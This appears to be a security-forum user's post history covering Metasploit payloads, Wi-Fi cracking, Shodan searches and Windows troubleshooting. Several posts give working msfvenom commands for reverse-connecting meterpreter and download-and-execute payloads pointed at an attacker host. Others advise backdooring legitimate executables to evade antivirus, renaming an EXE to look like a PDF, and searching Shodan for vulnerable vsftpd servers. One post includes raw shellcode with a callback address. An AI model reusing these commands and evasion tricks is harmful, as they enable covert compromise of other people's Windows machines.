
vailixi

Active Members
  • Posts: 377
  • Joined
  • Last visited
  • Days Won: 3

Posts posted by vailixi

  1. This is a stupid question. But do you have port 8080 open on the Windows 10 machine?

    netsh advfirewall firewall add rule name="Open Port 8080" dir=in action=allow protocol=TCP localport=8080

    If you want to test your payload to see if it works, test it without the firewall first.

    I had problems about a month ago trying to shell a Windows 10 box and here's some stuff I figured out. Windows 10 has some security features that are not available in previous versions of Windows. I'm not sure how it all works. Windows will notice that your payload is trying to hook into other system processes or DLLs on the Windows system. But if you inject your payload into the execution flow of a legitimate application it will run just fine and Windows isn't going to notice anything fishy.

    Here's something else you can do. Use a reverse_hop_http meterpreter.

    msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 --platform win HOPURL=http://192.168.0.184/hop.php EXTENSIONS=stdapi,priv -f raw -o /root/Desktop/donkeypunch.raw

    You can output it to whatever format you think will work. I noticed my payloads were getting flagged by security essentials and other anti-virus programs so I decided I would backdoor a legitimate executable. I did that with a program called shellter. Worked like a charm.

    Keep in mind that shellter will not work with all binaries and also doesn't work every time. Sometimes you will have to try backdooring the exe several times before it's successful. Shellter does a lot of stuff that is at this point technically beyond me. But you can read about it on the website. https://www.shellterproject.com/

    Once the payload is built, make it available for download. Don't forget to move hop.php to your /var/www/html/ folder and start apache.

    use exploit/multi/handler
    set HOPURL http://192.168.0.184/hop.php
    set payload windows/meterpreter/reverse_hop_http
    exploit -j

    Once the binary is run on the Windows 10 machine, you should see a session. If you get a session for like 20-30 seconds and then the session dies, it's because your payload was caught by Windows 10 security features.

    The great thing about this is once you build a payload like this it will work on Windows 7 or XP as well.

    Also I think there's a way to bind meterpreter to edge or internet explorer with prepend migrate and masquerade as that application so it can hop the firewall that way. If there is a way to do that I would like to know it.

  2. Pentesting tools can be quite loud as generally speaking if someone is paying you to test their network/site they know you are coming. If you are doing things passively, like sniffing for the handshake and cracking it offline then you are safe. I've always found the field of anti-forensics interesting too.

    I tend to agree here. If you are not actually running any attacks you are less likely to be detected. Is there a way to check for monitor mode devices? Are they actually sending anything or communicating at all? I know airodump will show probes and such from non-associated clients but is there a way to detect a monitor mode device?

    I know you can filter for deauthentication frames in wireshark. Changing your mac address is a must if you are actively penetrating.

  3. dd@dd:~$ shodan download --limit 1000 vsftpd "vsftpd 2.3.4"
    Search query:			vsftpd 2.3.4
    Total number of results:	2102
    Query credits left:		0
    Output file:			vsftpd.json.gz
      [####################################]  100%
    Notice: fewer results were saved than requested
    Saved 100 results into file vsftpd.json.gz
    

    Gets to 10% and quits at 100 results every time whether the --limit 1000 flag is used or not. ":)"

    Thanks for your time achillean. I'm sure you're a busy guy.

  4. Sounds like a matter of:

    dump access point information to a csv file

    read the access point data from the csv file into a temp file

    loop through the access points and run wifite in WPS mode against each access point. I'm sure there's a way to 'listen' for new entries into the file. Not sure how that works. But you pretty much can attack each new access point as it comes into range.

    Someone posted a ruby script for this a bit ago. It was much simpler than this one. https://forums.hak5.org/index.php?/topic/34617-how-to-reaver-dropbox-raspberry-pi/?hl=%2Breaver+%2Bruby

    I hope that helps a little bit.

    Edit ^ or just what Cooper suggests. He's pretty much right all of the time.

  5. So lately I've been checking out shodan.io and finding some interesting stuff. What I noticed is by default the CLI won't display more than 100 results at a time. What I got from the dev was that it displays 100 results per page but you could loop through the pages and display as many results as you want to but you have to tell it where to end so you don't burn up all of your credits.

    I'm really not sure how to loop through the pages and display more than 100 results. Anybody have any experience with this?
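The page-walking the dev described, as an added example that is not from the thread: a bounded pager that pulls pages of 100 matches until a caller-set ceiling or the last page, so a loop cannot run away and burn query credits. `search_fn` is injected so the logic can be checked offline with a constructed stand-in; `live_search` binds it to the real `shodan` library's `Shodan.search(query, page=...)` call and needs an API key.

```python
PAGE_SIZE = 100  # Shodan's CLI and API return at most 100 matches per page


def paged_search(search_fn, query, max_results):
    """Walk pages of results until max_results are collected or none remain.

    search_fn(query, page) must return a dict shaped like shodan.Shodan.search():
    {'total': <int>, 'matches': [<dict>, ...]}. Each page fetched can cost a
    query credit, so the loop stops on: the caller's ceiling, the last page
    implied by 'total', or an empty page (e.g. credits exhausted).
    Returns (matches, pages_fetched).
    """
    if max_results <= 0:
        return [], 0
    collected, page, pages_fetched = [], 1, 0
    while len(collected) < max_results:
        result = search_fn(query, page)
        pages_fetched += 1
        matches = result.get("matches") or []
        if not matches:
            break
        collected.extend(matches[: max_results - len(collected)])
        if page * PAGE_SIZE >= int(result.get("total", 0)):
            break  # that was the last page
        page += 1
    return collected, pages_fetched


def live_search(api_key):
    """Bind paged_search to the real API (needs the 'shodan' package and a key)."""
    import shodan  # imported lazily so the offline pager works without it

    api = shodan.Shodan(api_key)
    return lambda query, page: api.search(query, page=page)


def fake_search_factory(total):
    """Constructed stand-in for the API: 'total' matches served in pages of 100."""
    def fake(query, page):
        start = (page - 1) * PAGE_SIZE
        end = min(start + PAGE_SIZE, total)
        # 198.51.100.0/24 is documentation space, so these are constructed hits
        matches = [{"ip_str": f"198.51.100.{i % 256}", "query": query}
                   for i in range(start, end)]
        return {"total": total, "matches": matches}
    return fake
```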

  6. I was trying a bunch of ways to download and run programs then I was like ok there's a metasploit payload that does it. But it doesn't seem to want to work. I generated it with msfvenom a couple of different ways.

    First I tried generating some hex to add to my python script to use as a payload with a remote exploit. Didn't work though. Here's the exploit for reference https://www.exploit-db.com/exploits/39008/

    msfvenom -p windows/download_exec -e x86/shikata_ga_nai -i 3 -b '\x00' '\x20' '\x2f' '\x5c' --smallest --platform win -a x86 EXE=rocker.exe EXITFUNC=process URL=http://192.168.0.184/rocker.exe -f python -o /root/Desktop/down_exec.python
    

    Then I decided to create an exe and just try to run that on the target machine, but it just doesn't seem to be working. I'm not sure what I'm doing wrong here.

     msfvenom -p windows/download_exec -e x86/shikata_ga_nai -i 3 -b '\x00' '\x20' '\x2f' '\x5c' --smallest --platform win -a x86 EXE=rocker.exe EXITFUNC=process URL=http://192.168.0.184/rocker.exe -f exe -o /root/Desktop/down_exec.exe
    

    Not really sure what I'm doing wrong here.

  7. If you know the ESSID for the access point you will be testing you can always generate a precomputed table. If you have a system with a decent sized CPU you can create all of the PMKs ahead of time. It's still going to take the computation time initially but once it's done you are golden. One of the benefits to the precomputed table is if they change the password you might still have the password in your table. The only way to secure your access point against this kind of attack is to change the ESSID. But I think you can do this with the BSSID as well so you gotta change the MAC address. The point is if you make the rainbow table you're likely to get back in when the password has been changed. Of course there's always finding an OPN access point, one that is vuln to the Pixiedust attack, or a WEP protected access point. But really go for the lowest hanging fruit. That is, unless you really need to hit a specific access point and that is the only way you can gain access to the network. But it's probably not the only way in.

  8. I was having firewall issues.

    I remembered seeing a problem like this addressed in a segment of Metasploit Minute.

    I wanted to try windows/meterpreter/reverse_hop_http

    I set the payload to talk to hop.php that I installed on my local machine. That part I'm pretty sure works. I'm not sure what options I didn't set right for the handler but it's wanting to stage to example.com rather than the IP I set. I know I'm missing an option but I'm not sure where to set it.

    Edit: No idea what I was thinking there.

    use exploit/multi/handler
    set HOPURL http://192.168.0.184/hop.php
    set payload windows/meterpreter/reverse_hop_http
    exploit -j

    Second try. Nailed it.

  9. Few things. Are they services? (check in services.msc). One process starting another sounds more like dependencies in a service, which can restart themselves. As Cooper mentioned, only one process is the parent, but more than likely another process you don't see started it.

    Check out process explorer from the msft sysinternals stuff. It will show you all processes, and a tree like structure under them which are the child processes. It also lets you close them like task manager, but often works better than task manager when you get hung programs that won't let you kill them. Just right click and run as administrator first. Some services won't let you kill them easily, but can be shutdown in services.msc, and for those that don't show there, from the command line (run as admin first) with "net stop servicename". You can also do "sc query" to see all running services.

    Thanks. Yeah I was looking at processes and not services. I will try stopping services.

  10. I have a couple of processes running on Windows that just won't die. I figured out something kinda cool: you can use the /t and /f switches and sometimes but not always it will kill child processes. So sometimes you can't kill a process directly but you can force kill the parent process and that will kill the child process even if the parent process comes back access denied. I thought this was pretty novel.

    So I want to kill two processes but they are both the parent and child process of each other. How do I kill them? If I can't do it from command line is there a .NET function that I can use with VB, C#, or VC++?
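For the two posts above (the "is it a service?" reply and the respawning pair question), an added PowerShell example that is not from the thread: it maps each named process to its parent and checks whether the PID is registered to a Windows service, since a pair that keeps coming back is usually being restarted by the Service Control Manager and should be stopped as a service rather than killed. The process names are placeholders.

```powershell
# Added example (not from the thread): find who restarts a process pair.
# Names below are hypothetical placeholders; pass your own with -Names.
param(
    [string[]]$Names = @('procA.exe', 'procB.exe')
)

$procs    = Get-CimInstance -ClassName Win32_Process
$services = Get-CimInstance -ClassName Win32_Service
$byPid    = @{}
foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }

foreach ($name in $Names) {
    foreach ($p in ($procs | Where-Object Name -eq $name)) {
        $parent = $byPid[[int]$p.ParentProcessId]
        $parentLabel = if ($parent) { "$($parent.Name) (PID $($parent.ProcessId))" }
                       else { 'none (parent already exited)' }
        Write-Output "$($p.Name) PID $($p.ProcessId) <- parent $parentLabel"
        Write-Output "  image: $($p.ExecutablePath)"   # worth noting when a pair respawns unexpectedly

        # A PID registered against a service is managed by the SCM; its recovery
        # options can relaunch it after taskkill, which looks like "it won't die".
        $owners = $services | Where-Object { $_.ProcessId -ne 0 -and [int]$_.ProcessId -eq [int]$p.ProcessId }
        if ($owners) {
            foreach ($s in $owners) {
                Write-Output "  hosted by service '$($s.Name)' ($($s.State)); stop it with:"
                Write-Output "    Stop-Service -Name '$($s.Name)' -Force   # or: sc.exe stop $($s.Name)"
            }
        } else {
            Write-Output "  not a service process; Stop-Process -Id $($p.ProcessId) -Force  (taskkill /PID $($p.ProcessId) /T /F)"
        }
    }
}
```

Run it from an elevated PowerShell so Win32_Process returns the executable paths of processes owned by other accounts.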

  11. You don't need an exploit. Create your obfuscated payload. msfvenom alone isn't going to do it. But there are tools in Kali for handling this. Output your payload to an EXE file. Then simply right click on it and change the name of it to whatever.pdf. That's pretty much it.

  12. I don't really understand assembly code but I'm trying to learn it. I was curious, is there a way to dump any old binary into a format that I can deliver via metasploit? I haven't really looked at the mechanics of payload delivery but I'm assuming payloads are delivered in a format like this:

    fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d686e6574006877696e6954684c772607ffd531db5353535353683a5679a7ffd553536a03535368901f0000e8080100002f586f525f762d445a35485978345444675a37325779417636395562494b706a42506338623968496e516e7861374c515566425465567a4557415a776150506d6d4f6f316c58626e70436573454e67433939596d364853424c335058754a4f3468714c477374656f4468696c79784d53687557393363534346754e622d4249696b38756d00506857899fc6ffd589c653680032e08453535357535668eb552e3bffd5966a0a5f688033000089e06a04506a1f566875469e86ffd55353535356682d06187bffd585c075084f75d9e84a0000006a4068001000006800004000536858a453e5ffd593535389e7576800200000535668129689e2ffd585c074cf8b0701c385c075e558c35fe877ffffff3139322e3136382e302e31383400bbf0b5a2566a0053ffd5
    
    

    I suppose my question is: How do I go from a binary to this hex format? Is there an easy way to dump the binary into a ready-to-use assembly instruction set? If so what are the steps? If there's not an easy mode way to do this hypothetically what are the steps? Is it as simple as dumping the bytes into an array and outputting them that way?

    Can I take the output of objdump, hexdump, or xxd and create this usable byte array or string or whatever. I'm just really not sure where to start.

  13. I'm going to give you the best bit of advice on linux programs. Most command line programs will have a --help or -h option that will tell you usage for the program.

    arg0, arg1, arg2, etc

    command, first argument, second, etc

    There's also usually a man page for each installed program.

    man <command>

    There's also documentation for most programs; most of them will have a website or at least a google code or github with at least a readme file. Other programs will have more extensive documentation.

    Probably at this level you are not even sure what to look up so reading that documentation is going to give you the vocabulary you need to actually search for the solution to your problem. Troubleshooting isn't knowing a fix for every problem off of the top of your head. It's being able to deduce what you need to look up. Not even deducing the solution but being able to know what to look up so you can find the solution. So yeah, reading the documentation. If you don't like reading and looking stuff up a lot, hacking is probably not for you.

    lspci lsusb ifconfig iwconfig etc etc

    Maybe simply

    ifconfig

    then look at the interfaces, usually you have ethernet, wireless, and a loopback interface

    So something like lo, eth0, and wlan0 or something to that effect

    wlan0 or ath0 or something like that is the one you want

    then run wifite -i <wireless interface>
    where wireless interface is your wireless device
    i.e.

    wifite -i wlan0

    Also check out the options for mac randomization and things like that to keep yourself out of trouble.

  14. If you're a newb I would suggest catching up on the hak5 YouTube channel. I mean watch all of the videos. Learn a little bit. Come back and ask specific questions about specific technologies and specific aspects of security.

    And admit it. This is your homework.

  15. I'm doing a custom build with long instructions and it says copy a certain batch file and paste it into the start menu. But it's not working. It's not like with Windows 7 where you can just drag and drop. I'm not sure where the start menu folder is. Can anybody help me here?

    What is the location of the start menu folder in Windows 10?
